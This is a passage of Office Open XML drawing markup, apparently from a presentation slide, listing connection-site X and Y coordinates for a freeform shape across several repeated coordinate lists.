              <a:gd name="connsiteX20" fmla="*/ 309957 w 1342244"/>
              <a:gd name="connsiteY20" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 319080 w 1342244"/>
              <a:gd name="connsiteY21" fmla="*/ 5563435 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 348400 w 1342244"/>
              <a:gd name="connsiteY22" fmla="*/ 5449031 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 359524 w 1342244"/>
              <a:gd name="connsiteY23" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 375505 w 1342244"/>
              <a:gd name="connsiteY24" fmla="*/ 5330009 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 423664 w 1342244"/>
              <a:gd name="connsiteY25" fmla="*/ 5273739 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 429823 w 1342244"/>
              <a:gd name="connsiteY26" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 438105 w 1342244"/>
              <a:gd name="connsiteY27" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 441715 w 1342244"/>
              <a:gd name="connsiteY28" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 455581 w 1342244"/>
              <a:gd name="connsiteY29" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 458312 w 1342244"/>
              <a:gd name="connsiteY30" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 455016 w 1342244"/>
              <a:gd name="connsiteY31" fmla="*/ 5034192 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 456570 w 1342244"/>
              <a:gd name="connsiteY32" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 463479 w 1342244"/>
              <a:gd name="connsiteY33" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 474738 w 1342244"/>
              <a:gd name="connsiteY34" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 480641 w 1342244"/>
              <a:gd name="connsiteY35" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 486667 w 1342244"/>
              <a:gd name="connsiteY36" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 484474 w 1342244"/>
              <a:gd name="connsiteY37" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 479954 w 1342244"/>
              <a:gd name="connsiteY38" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 475037 w 1342244"/>
              <a:gd name="connsiteY39" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 471602 w 1342244"/>
              <a:gd name="connsiteY40" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 452255 w 1342244"/>
              <a:gd name="connsiteY41" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 453884 w 1342244"/>
              <a:gd name="connsiteY42" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 441584 w 1342244"/>
              <a:gd name="connsiteY43" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 441309 w 1342244"/>
              <a:gd name="connsiteY44" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 427604 w 1342244"/>
              <a:gd name="connsiteY45" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 433387 w 1342244"/>
              <a:gd name="connsiteY46" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 455981 w 1342244"/>
              <a:gd name="connsiteY47" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 453239 w 1342244"/>
              <a:gd name="connsiteY48" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 454972 w 1342244"/>
              <a:gd name="connsiteY49" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 458715 w 1342244"/>
              <a:gd name="connsiteY50" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 466877 w 1342244"/>
              <a:gd name="connsiteY51" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 474223 w 1342244"/>
              <a:gd name="connsiteY52" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 473519 w 1342244"/>
              <a:gd name="connsiteY53" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 476962 w 1342244"/>
              <a:gd name="connsiteY54" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 484500 w 1342244"/>
              <a:gd name="connsiteY55" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 498392 w 1342244"/>
              <a:gd name="connsiteY56" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 504159 w 1342244"/>
              <a:gd name="connsiteY57" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 480918 w 1342244"/>
              <a:gd name="connsiteY58" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 456326 w 1342244"/>
              <a:gd name="connsiteY59" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 441801 w 1342244"/>
              <a:gd name="connsiteY60" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 416975 w 1342244"/>
              <a:gd name="connsiteY61" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 374255 w 1342244"/>
              <a:gd name="connsiteY62" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 308507 w 1342244"/>
              <a:gd name="connsiteY63" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 279324 w 1342244"/>
              <a:gd name="connsiteY64" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 283394 w 1342244"/>
              <a:gd name="connsiteY65" fmla="*/ 2423438 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 272284 w 1342244"/>
              <a:gd name="connsiteY66" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 274896 w 1342244"/>
              <a:gd name="connsiteY67" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 251225 w 1342244"/>
              <a:gd name="connsiteY68" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 241112 w 1342244"/>
              <a:gd name="connsiteY69" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 225329 w 1342244"/>
              <a:gd name="connsiteY70" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 222787 w 1342244"/>
              <a:gd name="connsiteY71" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 223780 w 1342244"/>
              <a:gd name="connsiteY72" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 196764 w 1342244"/>
              <a:gd name="connsiteY73" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 173321 w 1342244"/>
              <a:gd name="connsiteY74" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 127120 w 1342244"/>
              <a:gd name="connsiteY75" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 99431 w 1342244"/>
              <a:gd name="connsiteY76" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 98557 w 1342244"/>
              <a:gd name="connsiteY77" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 79352 w 1342244"/>
              <a:gd name="connsiteY78" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 85174 w 1342244"/>
              <a:gd name="connsiteY79" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 71259 w 1342244"/>
              <a:gd name="connsiteY80" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 79566 w 1342244"/>
              <a:gd name="connsiteY81" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 85439 w 1342244"/>
              <a:gd name="connsiteY82" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 77721 w 1342244"/>
              <a:gd name="connsiteY83" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 67027 w 1342244"/>
              <a:gd name="connsiteY84" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 55763 w 1342244"/>
              <a:gd name="connsiteY85" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 57219 w 1342244"/>
              <a:gd name="connsiteY86" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 52084 w 1342244"/>
              <a:gd name="connsiteY87" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 21492 w 1342244"/>
              <a:gd name="connsiteY88" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 442 w 1342244"/>
              <a:gd name="connsiteY89" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 0 w 1342244"/>
              <a:gd name="connsiteY90" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 9132 w 1342244"/>
              <a:gd name="connsiteY91" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 2788 w 1342244"/>
              <a:gd name="connsiteY92" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 84 w 1342244"/>
              <a:gd name="connsiteY93" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 3992 w 1342244"/>
              <a:gd name="connsiteY94" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 30116 w 1342244"/>
              <a:gd name="connsiteY95" fmla="*/ 446567 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 29364 w 1342244"/>
              <a:gd name="connsiteY96" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 29194 w 1342244"/>
              <a:gd name="connsiteY97" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 34887 w 1342244"/>
              <a:gd name="connsiteY98" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 44581 w 1342244"/>
              <a:gd name="connsiteY99" fmla="*/ 236673 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 43624 w 1342244"/>
              <a:gd name="connsiteY100" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 33909 w 1342244"/>
              <a:gd name="connsiteY101" fmla="*/ 33857 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 15462 w 1342244"/>
              <a:gd name="connsiteY102" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 15462 w 1342244"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1342244 w 1342244"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1342244 w 1342244"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 78938 w 1342244"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 115531 w 1342244"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 127031 w 1342244"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 144438 w 1342244"/>
              <a:gd name="connsiteY6" fmla="*/ 6686827 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 143794 w 1342244"/>
              <a:gd name="connsiteY7" fmla="*/ 6659970 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 161862 w 1342244"/>
              <a:gd name="connsiteY8" fmla="*/ 6594177 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 228859 w 1342244"/>
              <a:gd name="connsiteY9" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 244546 w 1342244"/>
              <a:gd name="connsiteY10" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 271474 w 1342244"/>
              <a:gd name="connsiteY11" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 263386 w 1342244"/>
              <a:gd name="connsiteY12" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 251160 w 1342244"/>
              <a:gd name="connsiteY13" fmla="*/ 6231403 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 243818 w 1342244"/>
              <a:gd name="connsiteY14" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 242616 w 1342244"/>
              <a:gd name="connsiteY15" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 255587 w 1342244"/>
              <a:gd name="connsiteY16" fmla="*/ 6061464 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 245418 w 1342244"/>
              <a:gd name="connsiteY17" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 230647 w 1342244"/>
              <a:gd name="connsiteY18" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 280159 w 1342244"/>
              <a:gd name="connsiteY19" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 309957 w 1342244"/>
              <a:gd name="connsiteY20" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 319080 w 1342244"/>
              <a:gd name="connsiteY21" fmla="*/ 5563435 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 348400 w 1342244"/>
              <a:gd name="connsiteY22" fmla="*/ 5449031 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 359524 w 1342244"/>
              <a:gd name="connsiteY23" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 375505 w 1342244"/>
              <a:gd name="connsiteY24" fmla="*/ 5330009 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 423664 w 1342244"/>
              <a:gd name="connsiteY25" fmla="*/ 5273739 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 429823 w 1342244"/>
              <a:gd name="connsiteY26" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 438105 w 1342244"/>
              <a:gd name="connsiteY27" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 441715 w 1342244"/>
              <a:gd name="connsiteY28" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 455581 w 1342244"/>
              <a:gd name="connsiteY29" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 458312 w 1342244"/>
              <a:gd name="connsiteY30" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 456570 w 1342244"/>
              <a:gd name="connsiteY31" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 463479 w 1342244"/>
              <a:gd name="connsiteY32" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 474738 w 1342244"/>
              <a:gd name="connsiteY33" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 480641 w 1342244"/>
              <a:gd name="connsiteY34" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 486667 w 1342244"/>
              <a:gd name="connsiteY35" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 484474 w 1342244"/>
              <a:gd name="connsiteY36" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 479954 w 1342244"/>
              <a:gd name="connsiteY37" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 475037 w 1342244"/>
              <a:gd name="connsiteY38" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 471602 w 1342244"/>
              <a:gd name="connsiteY39" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 452255 w 1342244"/>
              <a:gd name="connsiteY40" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 453884 w 1342244"/>
              <a:gd name="connsiteY41" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 441584 w 1342244"/>
              <a:gd name="connsiteY42" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 441309 w 1342244"/>
              <a:gd name="connsiteY43" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 427604 w 1342244"/>
              <a:gd name="connsiteY44" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 433387 w 1342244"/>
              <a:gd name="connsiteY45" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 455981 w 1342244"/>
              <a:gd name="connsiteY46" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 453239 w 1342244"/>
              <a:gd name="connsiteY47" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 454972 w 1342244"/>
              <a:gd name="connsiteY48" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 458715 w 1342244"/>
              <a:gd name="connsiteY49" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 466877 w 1342244"/>
              <a:gd name="connsiteY50" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 474223 w 1342244"/>
              <a:gd name="connsiteY51" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 473519 w 1342244"/>
              <a:gd name="connsiteY52" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 476962 w 1342244"/>
              <a:gd name="connsiteY53" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 484500 w 1342244"/>
              <a:gd name="connsiteY54" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 498392 w 1342244"/>
              <a:gd name="connsiteY55" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 504159 w 1342244"/>
              <a:gd name="connsiteY56" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 480918 w 1342244"/>
              <a:gd name="connsiteY57" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 456326 w 1342244"/>
              <a:gd name="connsiteY58" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 441801 w 1342244"/>
              <a:gd name="connsiteY59" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 416975 w 1342244"/>
              <a:gd name="connsiteY60" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 374255 w 1342244"/>
              <a:gd name="connsiteY61" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 308507 w 1342244"/>
              <a:gd name="connsiteY62" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 279324 w 1342244"/>
              <a:gd name="connsiteY63" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 283394 w 1342244"/>
              <a:gd name="connsiteY64" fmla="*/ 2423438 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 272284 w 1342244"/>
              <a:gd name="connsiteY65" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 274896 w 1342244"/>
              <a:gd name="connsiteY66" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 251225 w 1342244"/>
              <a:gd name="connsiteY67" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 241112 w 1342244"/>
              <a:gd name="connsiteY68" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 225329 w 1342244"/>
              <a:gd name="connsiteY69" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 222787 w 1342244"/>
              <a:gd name="connsiteY70" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 223780 w 1342244"/>
              <a:gd name="connsiteY71" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 196764 w 1342244"/>
              <a:gd name="connsiteY72" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 173321 w 1342244"/>
              <a:gd name="connsiteY73" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 127120 w 1342244"/>
              <a:gd name="connsiteY74" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 99431 w 1342244"/>
              <a:gd name="connsiteY75" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 98557 w 1342244"/>
              <a:gd name="connsiteY76" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 79352 w 1342244"/>
              <a:gd name="connsiteY77" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 85174 w 1342244"/>
              <a:gd name="connsiteY78" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 71259 w 1342244"/>
              <a:gd name="connsiteY79" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 79566 w 1342244"/>
              <a:gd name="connsiteY80" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 85439 w 1342244"/>
              <a:gd name="connsiteY81" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 77721 w 1342244"/>
              <a:gd name="connsiteY82" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 67027 w 1342244"/>
              <a:gd name="connsiteY83" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 55763 w 1342244"/>
              <a:gd name="connsiteY84" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 57219 w 1342244"/>
              <a:gd name="connsiteY85" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 52084 w 1342244"/>
              <a:gd name="connsiteY86" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 21492 w 1342244"/>
              <a:gd name="connsiteY87" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 442 w 1342244"/>
              <a:gd name="connsiteY88" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 0 w 1342244"/>
              <a:gd name="connsiteY89" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 9132 w 1342244"/>
              <a:gd name="connsiteY90" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 2788 w 1342244"/>
              <a:gd name="connsiteY91" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 84 w 1342244"/>
              <a:gd name="connsiteY92" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 3992 w 1342244"/>
              <a:gd name="connsiteY93" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 30116 w 1342244"/>
              <a:gd name="connsiteY94" fmla="*/ 446567 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 29364 w 1342244"/>
              <a:gd name="connsiteY95" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 29194 w 1342244"/>
              <a:gd name="connsiteY96" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 34887 w 1342244"/>
              <a:gd name="connsiteY97" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 44581 w 1342244"/>
              <a:gd name="connsiteY98" fmla="*/ 236673 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 43624 w 1342244"/>
              <a:gd name="connsiteY99" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 33909 w 1342244"/>
              <a:gd name="connsiteY100" fmla="*/ 33857 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 15462 w 1342244"/>
              <a:gd name="connsiteY101" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 15462 w 1342244"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1342244 w 1342244"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1342244 w 1342244"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 78938 w 1342244"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 115531 w 1342244"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 127031 w 1342244"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 144438 w 1342244"/>
              <a:gd name="connsiteY6" fmla="*/ 6686827 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 143794 w 1342244"/>
              <a:gd name="connsiteY7" fmla="*/ 6659970 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 161862 w 1342244"/>
              <a:gd name="connsiteY8" fmla="*/ 6594177 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 228859 w 1342244"/>
              <a:gd name="connsiteY9" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 244546 w 1342244"/>
              <a:gd name="connsiteY10" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 271474 w 1342244"/>
              <a:gd name="connsiteY11" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 263386 w 1342244"/>
              <a:gd name="connsiteY12" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 251160 w 1342244"/>
              <a:gd name="connsiteY13" fmla="*/ 6231403 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 243818 w 1342244"/>
              <a:gd name="connsiteY14" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 242616 w 1342244"/>
              <a:gd name="connsiteY15" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 255587 w 1342244"/>
              <a:gd name="connsiteY16" fmla="*/ 6061464 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 245418 w 1342244"/>
              <a:gd name="connsiteY17" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 230647 w 1342244"/>
              <a:gd name="connsiteY18" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 280159 w 1342244"/>
              <a:gd name="connsiteY19" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 309957 w 1342244"/>
              <a:gd name="connsiteY20" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 319080 w 1342244"/>
              <a:gd name="connsiteY21" fmla="*/ 5563435 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 348400 w 1342244"/>
              <a:gd name="connsiteY22" fmla="*/ 5449031 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 359524 w 1342244"/>
              <a:gd name="connsiteY23" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 375505 w 1342244"/>
              <a:gd name="connsiteY24" fmla="*/ 5330009 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 423664 w 1342244"/>
              <a:gd name="connsiteY25" fmla="*/ 5264214 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 429823 w 1342244"/>
